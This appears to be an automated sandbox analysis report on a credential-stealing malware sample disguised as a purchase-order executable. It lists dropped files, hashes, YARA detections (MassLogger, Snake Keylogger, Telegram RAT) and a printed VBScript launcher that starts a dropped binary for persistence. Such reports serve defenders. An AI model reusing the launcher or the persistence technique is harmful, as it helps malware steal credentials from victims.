                                                                                                                                                                                                    Preview:...GTEHACJZJ..EE.P4L9IZD.WEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP.L9IT[.YE.H.k.K..d.-9GlI;5#56(h"&$4%%.' e"A". 4d...h,(.?d\<OaEP4L9IZ,W.hd0.4v;.Oi4...oF7e5.)N..9a+./.4.;.E.G{y*9K4.?ui34.@.;wsO2.8.:.>& m6.$JQ1EEEP4L9IZDGWEd.x-ZJQ1..EPxM=I..G.EHAGJZJQ.EfD[5E9I.EGW.KAGJZJ~.EEE@4L9.[DGW.HAWJZJS1E@EP4L9IZAGWEHAGJZ.T1EAEP.w;IXDG.EHQGJJJQ1EUEP$L9IZDGGEHAGJZJQ1EE.E6LiIZDG7GHmcIZJQ1EEEP4L9IZDGWEHAGJZJQ1..DP(L9IZDGWEHAGJZJQ1EEEP4L9IZDG.HJA.JZJQ1EEEP4L9.[D.VEHAGJZJQ1EEEP4L9IZDGWEHAGJt>4I1EEP,.8IZTGWE.@GJ^JQ1EEEP4L9IZDGwEH!i8>+%PEE.=4L9.[DG9EHA.KZJQ1EEEP4L9IZ.GW.f%&>;JQ1.uEP4l;IZRGWEBCGJZJQ1EEEP4L9.ZD.y7;3$JZJ}.FEE06L9oYDGwGHAGJZJQ1EEEP4.9I.DGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe
                                                                                                                                                                                                    File Type:StarOffice Gallery theme TEHACJZJ\256\316EE\375P4L9IZD\007WEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP\324L9IT[\375YE\374H\212k\342K\035\374d\021-9GlI;5#56(h"&$4%%\021' e"A"\031 4d\003\030\026h,(.?d\<OaEP4L9IZ,W, 2110219414 objects, 1st >\266\276\270\311\236F\017\362\211\211\211\234\370\200j\037\321\264t\214\300\276N\303\354ZJQ\261;\0312_\261\3209IZ\315\031S\022\305%cJ\345J\0211En;@@h\262\017\032\317\011\037\025\037+F\033\262\25061E\306\201@\017\213L \321\022\017\336\023D\206\001ZZ
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):345600
                                                                                                                                                                                                    Entropy (8bit):7.924466320417484
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6144:FKaFQX5Ww5c0otBSF41oK+R+Ayrn8VUYcgHPWcxrVlqUdgCdX/fi0uolmaObG/CU:FKB5b2nBS41oK+R+xg3ZHPFlIm/qEzBd
                                                                                                                                                                                                    MD5:51E866564694747435D2C707254F6500
                                                                                                                                                                                                    SHA1:7FEF0E2DD8476BF3F61E7D8D331AC755AED8BA54
                                                                                                                                                                                                    SHA-256:41A60725A3EAF4699984C16A7F5EA639961677B994A96540D4C9FE0EE0641506
                                                                                                                                                                                                    SHA-512:987B9C306A2B53F2E4F02B8BB363290503BA91DCBB0C9D46AE4677528383C9885BC7C5964D32EC68BE14BE3E47DA84BBF7CC479BC583C65B76BE4B394AC2D588
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:...GTEHACJZJ..EE.P4L9IZD.WEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP.L9IT[.YE.H.k.K..d.-9GlI;5#56(h"&$4%%.' e"A". 4d...h,(.?d\<OaEP4L9IZ,W.hd0.4v;.Oi4...oF7e5.)N..9a+./.4.;.E.G{y*9K4.?ui34.@.;wsO2.8.:.>& m6.$JQ1EEEP4L9IZDGWEd.x-ZJQ1..EPxM=I..G.EHAGJZJQ.EfD[5E9I.EGW.KAGJZJ~.EEE@4L9.[DGW.HAWJZJS1E@EP4L9IZAGWEHAGJZ.T1EAEP.w;IXDG.EHQGJJJQ1EUEP$L9IZDGGEHAGJZJQ1EE.E6LiIZDG7GHmcIZJQ1EEEP4L9IZDGWEHAGJZJQ1..DP(L9IZDGWEHAGJZJQ1EEEP4L9IZDG.HJA.JZJQ1EEEP4L9.[D.VEHAGJZJQ1EEEP4L9IZDGWEHAGJt>4I1EEP,.8IZTGWE.@GJ^JQ1EEEP4L9IZDGwEH!i8>+%PEE.=4L9.[DG9EHA.KZJQ1EEEP4L9IZ.GW.f%&>;JQ1.uEP4l;IZRGWEBCGJZJQ1EEEP4L9.ZD.y7;3$JZJ}.FEE06L9oYDGwGHAGJZJQ1EEEP4.9I.DGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ
                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):98304
                                                                                                                                                                                                    Entropy (8bit):5.678429468734117
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:kwa4JHA8xaqWUiRzGJVeygdqcyxCVf1UMR7pfpPYlM:M4JgqWUi5GJVey2qcyi+MDfpPr
                                                                                                                                                                                                    MD5:0CDBE0CD3CB5C2F0B2CB17E4417D43F5
                                                                                                                                                                                                    SHA1:E3AA6201E5A42ADFA1BFB4506D6852DE22E07494
                                                                                                                                                                                                    SHA-256:7F73743991E06E23B0A1FEC66A8FA5F194D49FBE15C58473D10798758C856D31
                                                                                                                                                                                                    SHA-512:3D125DAE61F960D7E32C0EB4D301EFA3322AB8201E83FB7343EF4C28ED6B788B1906E09106F8A3052630DD880FD278623F7887ED472D7C2552DB96CB3F1C8986
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                    • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: Joe Security
                                                                                                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: unknown
                                                                                                                                                                                                    • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: Florian Roth
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................P..v..........^.... ........@.. ....................................`.....................................W.................................................................................... ............... ..H............text...du... ...v.................. ..`.rsrc................x..............@..@.reloc...............~..............@..B................@.......H.......t...........Z....................................................}.....is.......................~...F...@...7...%...m...$...~...~...d...r...a...G...o...n...~.....(....*&..( ....*.s!........s"........s#........s$........s%........*Z........o8...........*&..(9....*&........*".......*Vs....(B...t.........*..(C...*"~....+.*"~....+.*"~....+.*"~....+.*"~....+.*b.r...p.oa...(....(@....*:.~.....o....&*.*:.(P....(Q....*..~3...,.~3...+.~1.....x...s....%.3...(.....*..(Y....(L...
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe
                                                                                                                                                                                                    File Type:StarOffice Gallery theme TEHACJZJ\256\316EE\375P4L9IZD\007WEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP\324L9IT[\375YE\374H\212k\342K\035\374d\021-9GlI;5#56(h"&$4%%\021' e"A"\031 4d\003\030\026h,(.?d\<OaEP4L9IZ,W, 2110219414 objects, 1st >\266\276\270\311\236F\017\362\211\211\211\234\370\200j\037\321\264t\214\300\276N\303\354ZJQ\261;\0312_\261\3209IZ\315\031S\022\305%cJ\345J\0211En;@@h\262\017\032\317\011\037\025\037+F\033\262\25061E\306\201@\017\213L \321\022\017\336\023D\206\001ZZ
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):345600
                                                                                                                                                                                                    Entropy (8bit):7.924466320417484
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6144:FKaFQX5Ww5c0otBSF41oK+R+Ayrn8VUYcgHPWcxrVlqUdgCdX/fi0uolmaObG/CU:FKB5b2nBS41oK+R+xg3ZHPFlIm/qEzBd
                                                                                                                                                                                                    MD5:51E866564694747435D2C707254F6500
                                                                                                                                                                                                    SHA1:7FEF0E2DD8476BF3F61E7D8D331AC755AED8BA54
                                                                                                                                                                                                    SHA-256:41A60725A3EAF4699984C16A7F5EA639961677B994A96540D4C9FE0EE0641506
                                                                                                                                                                                                    SHA-512:987B9C306A2B53F2E4F02B8BB363290503BA91DCBB0C9D46AE4677528383C9885BC7C5964D32EC68BE14BE3E47DA84BBF7CC479BC583C65B76BE4B394AC2D588
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:...GTEHACJZJ..EE.P4L9IZD.WEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP.L9IT[.YE.H.k.K..d.-9GlI;5#56(h"&$4%%.' e"A". 4d...h,(.?d\<OaEP4L9IZ,W.hd0.4v;.Oi4...oF7e5.)N..9a+./.4.;.E.G{y*9K4.?ui34.@.;wsO2.8.:.>& m6.$JQ1EEEP4L9IZDGWEd.x-ZJQ1..EPxM=I..G.EHAGJZJQ.EfD[5E9I.EGW.KAGJZJ~.EEE@4L9.[DGW.HAWJZJS1E@EP4L9IZAGWEHAGJZ.T1EAEP.w;IXDG.EHQGJJJQ1EUEP$L9IZDGGEHAGJZJQ1EE.E6LiIZDG7GHmcIZJQ1EEEP4L9IZDGWEHAGJZJQ1..DP(L9IZDGWEHAGJZJQ1EEEP4L9IZDG.HJA.JZJQ1EEEP4L9.[D.VEHAGJZJQ1EEEP4L9IZDGWEHAGJt>4I1EEP,.8IZTGWE.@GJ^JQ1EEEP4L9IZDGwEH!i8>+%PEE.=4L9.[DG9EHA.KZJQ1EEEP4L9IZ.GW.f%&>;JQ1.uEP4l;IZRGWEBCGJZJQ1EEEP4L9.ZD.y7;3$JZJ}.FEE06L9oYDGwGHAGJZJQ1EEEP4.9I.DGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe
                                                                                                                                                                                                    File Type:OpenPGP Secret Key
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):12320
                                                                                                                                                                                                    Entropy (8bit):7.985026900285246
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:q4ON/EqEYn5S3rXbS0rr+03+QY/iZJdbfwof4:MOqEY5ITrrXnEEdbfwof4
                                                                                                                                                                                                    MD5:2B59B03FBDD69A311F16C97480B6248B
                                                                                                                                                                                                    SHA1:B52127E02F4A4EA3E8C4D03F7D18739067D69E0A
                                                                                                                                                                                                    SHA-256:DAB886153BDD1EEA666442433C379C4C36F615E2D6178E251D8F20D65E400E45
                                                                                                                                                                                                    SHA-512:49058694DAA45579B5D7678817FFFCCFCAB330E75E6FEA26AD336DA75C411C0048A6191E4E7D600F3FC36AEDDA2B3202F55C657C7DC546EF9E761BA63FE0BF54
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:.B.v..6Q(..!.r..E....I.0J....8]$w.U.Dc..k.'......I......<.x..-..<..~aaMsG......Mc...2$.H..E........O.M....?,...?....<...Jg..;D.9..._(.....{.q.f'......0.vd).e..=z...:..H.zT...[.u.F...`..._........;S.{.w..'A..oX..^By.o......(............K..u.......x..c...nVM...........F.I.-..S..}....+..+.....r....]..xLT...AS.S@6.\b..8r.r.f.......}[.....y..........`.WC@b.xM^.."*...(l9..o.i_O.4KO.N.........p!1)...A@.........4........do...G<.uT.._...QGN..p..p.'N.x.).3.&..B.).@..c..,...'B8#.0..*..\.#XE.S.8.c....l.eZk.g.....O.k}0x%T..v..F....j...........<.1R..6.9......hff..<.y.....D.d;<...d9....<mU......Bs8.e"8.p....Pn./.y...P.F...8.J...s...r.....]@..."..jsI^...2.`...*?`..l.Og.F.k...d/..^.=.uG......|.y.|(AX....J...2{]..p.i.m....bH< ....'..4.B...w..r..U.....".T..T|....l_.'V.2e...C8*.5.JQ{.r..mc.m..O3.......jJ.p.1...j.@iy..../..we...<.t..|.1...n..Z...q..E....,..[...aY...:.....L...^........T.t}.:NS.{....WjI..v.*.Ge..aq..UVq...#.e[,/..qV..C.M......3
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):665670656
                                                                                                                                                                                                    Entropy (8bit):7.9999993098427975
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                    MD5:8EBEFAB8EF46B9960EDB099737B0E1ED
                                                                                                                                                                                                    SHA1:325A0F5B9A768BC3E936B36E17A82B51FE14EB12
                                                                                                                                                                                                    SHA-256:528D12368F9811117E31EFB317FCCE2EBA59ADAAA4D20D2F0D695BAEDE3B1762
                                                                                                                                                                                                    SHA-512:B10F5AAD894FB11AF9C70E06A738B9E73B4DCC4080E759ADC4A226B01A6DCFDE5486F881CDA0D0A01A8AEEB07FC58B3BA3333256A203CD646F1346F3C792744D
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):276
                                                                                                                                                                                                    Entropy (8bit):3.4099935178663547
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:DMM8lfm3OOQdUfclo5ZsUEZ+lX1qK/1JYnriIM8lfQVn:DsO+vNlzQ1rJOmA2n
                                                                                                                                                                                                    MD5:4EBDB199F5AFBAAC3EE261C08C587144
                                                                                                                                                                                                    SHA1:59CA0D62EE60B4307BA74526438505E667E536DE
                                                                                                                                                                                                    SHA-256:4E579F8911E995D8C6C381F949F6B1CBDB7EEC5B379C944EF00899665958B64F
                                                                                                                                                                                                    SHA-512:2DB8C910A888B070BFECCEA1F3D354D49DE246617708DFDE408227FFD28F1AAD7902A3BB06E1527729D00A16642203EB34EE6DBF4E6304C5FE31C40E92FDEB51
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.D.u.n.l.o.p.\.G.r.i.n.n.e.l.l.i.a...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Fri Nov 22 16:55:08 2024, mtime=Fri Nov 22 16:55:08 2024, atime=Fri Nov 22 16:55:08 2024, length=70656, window=
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1778
                                                                                                                                                                                                    Entropy (8bit):3.484940049908394
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:8tvfB8LmZ3Y8IemnMeQAPoFG9KmR+O4ZvPqRupJm:8dOD8IeGwcR+ZXqRU
                                                                                                                                                                                                    MD5:71CEFB591F096460A152753CB4529830
                                                                                                                                                                                                    SHA1:A02FD96D5C16E29C0CBAFB4D1B5CC01E2596E33E
                                                                                                                                                                                                    SHA-256:742C05F612CC382ACCEAC57CBCBFAC8E2520DBF801DB81BD632F93AFCFBE4276
                                                                                                                                                                                                    SHA-512:727B230F01677E6995434D946AA53BE642F0110F95070F4FB0EC9A4B229DD033E799B64C8CDA98A17CCC79E08E35B1808F0CA7F74E5A1011C72E22F1BB9B9760
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:L..................F.@.. ....JL..=...JL..=...JL..=............................:..DG..Yr?.D..U..k0.&...&...... M.....P...=...qS..=......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlvY.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....vY....Roaming.@......DWSlvY......C.........................R.o.a.m.i.n.g.....T.1.....vY...ACCApi..>......vY.vY...............................A.C.C.A.p.i.....b.2.....vY. .apihost.exe.H......vY.vY...............................a.p.i.h.o.s.t...e.x.e.......a...............-.......`....................C:\Users\user\AppData\Roaming\ACCApi\apihost.exe....A.c.c.S.y.s.!.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.a.p.i.h.o.s.t...e.x.e.4.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.T.r.a.d.i.n.g._.A.I.B.o.t...e.x.e.........%USERPROFILE%\AppData\Local\Temp\Trading_AIBot.exe.........................................................................................................................
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe
                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1348608
                                                                                                                                                                                                    Entropy (8bit):7.253761982049738
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:DQW4qoNUgslKNX0Ip0MgHCpoMBOufsqjnhMgeiCl7G0nehbGZpbD:DQW9BKNX0IPgiKMBOuDDmg27RnWGj
                                                                                                                                                                                                    MD5:C694BB2A60BDA8FD88F36DC094FF6DB0
                                                                                                                                                                                                    SHA1:F37DD6A789E26F55D1719439BD4B75B83E198266
                                                                                                                                                                                                    SHA-256:A78C10A408F498A153C4AD791C69D9F752499CDC3AC1538BC4BE850CBFDC7A5A
                                                                                                                                                                                                    SHA-512:7CCBD89DC2C3591FA227A6A238C610CBBC536544BE106994BA87E218B9761E0FB6778B3A30C44C35FA9E418C2133036FF9D1C48DB9F9437174303DC0B59D564A
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@....................................nY.... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                    Size (bytes):1224192
                                                                                                                                                                                                    Entropy (8bit):5.1635699795775825
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:02G7AbHjkcsqjnhMgeiCl7G0nehbGZpbD:02G7AbHjhDmg27RnWGj
                                                                                                                                                                                                    MD5:9FDC7FC3E3CBA0CDE67F133391783A01
                                                                                                                                                                                                    SHA1:435AF62C48D9AF690A03F109599A05CF400B757E
                                                                                                                                                                                                    SHA-256:63329ACB43E81687252E0CB5D975CAA9C3F943F819DE3754E19979AEB5874539
                                                                                                                                                                                                    SHA-512:38BA44570DDD95E81AAC9889769141A9308872A6746E3C0AC8880C26EE4EA3F033A2AFF702594EA03A1D61027B1B60F0A7E3BA654E53E963FD1F87BBA7004C47
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@....................................K..... .......... ......................................p?...................................... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...P.......@...n..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1225728
                                                                                                                                                                                                    Entropy (8bit):5.1633270110621385
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:qEP3R6FXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:J6FsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:DA0B96A9E5E0F99A5EF268C07A1A1025
                                                                                                                                                                                                    SHA1:439F064C4AD8C17B0D06ACF25F86B7F82A3122C4
                                                                                                                                                                                                    SHA-256:EBB24977B8CE83B9E84DE29F40C03A46AD68B125D8E7E390BA411DFECD5D1C4B
                                                                                                                                                                                                    SHA-512:CEB66F6E131D2618C094D7F11E1B8F9E09941561DEA8F5206AB0020C7DF42CF79D1AFBE8DDB2DDF03140815ABA9ADC64F6012A7E7D0D5276A130B3F0306FE16A
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@.....................................J.... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...P.......@...t..............@...................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):12320
                                                                                                                                                                                                    Entropy (8bit):7.984329970736749
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:xEOxwZKpX29Dmmmgbh+uX0I8RsRjS24kX1znI:HJd2rh+qVeQ+lk9I
                                                                                                                                                                                                    MD5:6E6C3EDDFAB710148F52A1C8CD379F76
                                                                                                                                                                                                    SHA1:850B750AE69E1A799904FCD678431415A343D455
                                                                                                                                                                                                    SHA-256:2F74342265B4915D003FB2965E49EA17BF5908901773ADF0F18815C3A5B1232D
                                                                                                                                                                                                    SHA-512:A89D5174C44C21E7962B134B2C0E04CFA8700B8A59F0BB72B85F6513D5EF23C30DCECF9268D0D49532EE140332215D7A3C9AEBF09A64BD68E27B193F5E9AD244
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:"%.1...u.;...er..s@.Y(9....2*._.......<......<|.Eyi..+...h.q\..!...............\.bj4lz .;...P.i.(.......Bl...1.r.....H....9.~u..,l:..v..k......r.....A..6B+..M..N....F......p....B.K.fY.z.Ms....Q......Q.q2Lv......5...q....D......g...X.*l..c..Q..P$...@|...K...~..0].E.k.. . .]..u....G[s...3V.3q/....$Av.........(b...I.....(q.J.I...!..mG8. ....W.Yf.Y<.K$w..Sr1n4.F...f0qcN#F.....~..6..+..[.u1..,.\.;.....Z...d.....>..<..P4.6.4.@..,..KN..[.g.C...l0...n..5.........x2(..@.IV...{.*.=..I@,..J...".......T.....S..=.j....!xZ.t.Ci.....j9q.7p......(..%.5^..8.#.pm.N..`....0......;.....|,...}.E..../.c..5......%T.._hZ..F..~.3..\..\C.....).....9<h.Int.h.,...t$}OG...F....EQ(SkJ....u:/I..Dk.-...K..J..........o.nH.[[?..U.nb4j{..i...kCS.3B?8...H.....bN.Ng.......%...;..>...Rxx.(.<.7..I.."D"..q....Em.o}..X.2.g2..A.iK..........wl......P..F.rj3{..S.....C_5...R..'...4-..sU..uT_._o....?"../.b..pU.P...C..H...v..K1C.;"..>OC..|S8.<...G8.e.........O.w......W..M..
                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Entropy (8bit):7.517430962460623
                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                    File name:PO #09465610_GQ 003745_SO-242000846.exe
                                                                                                                                                                                                    File size:1'851'904 bytes
                                                                                                                                                                                                    MD5:33ffa6b9a3022156b4592e17f1a9a074
                                                                                                                                                                                                    SHA1:8ec7beb8a9bb5c5fdf769698ea2abf553e6a655d
                                                                                                                                                                                                    SHA256:b336830d627101633db934f8d48606639c70d133a5985026bc250c035e887faf
                                                                                                                                                                                                    SHA512:046bb90347baf7fb63536eb0b527e8bf881db5220617ad4e679b4123fc5d81363f2ed98ccc966c19197db68261783c6c9d332ce9ec45645065d80935886f25be
                                                                                                                                                                                                    SSDEEP:24576:Otb20pfaCqT5TBWgNQ7aDEgJ+y+wn4DocDtE6AE5sqjnhMgeiCl7G0nehbGZpbD:7Yg5tQ7aDEPy+wn47DK5qDmg27RnWGj
                                                                                                                                                                                                    TLSH:D885F02373DD8365C7B26273BA65B741BE7B7C2506B0F86B2FD4093DA920121521EA73
                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                                                                                                                                                                                    Icon Hash:aaf3e3e3938382a0
                                                                                                                                                                                                    Entrypoint:0x425f74
                                                                                                                                                                                                    Entrypoint Section:.text
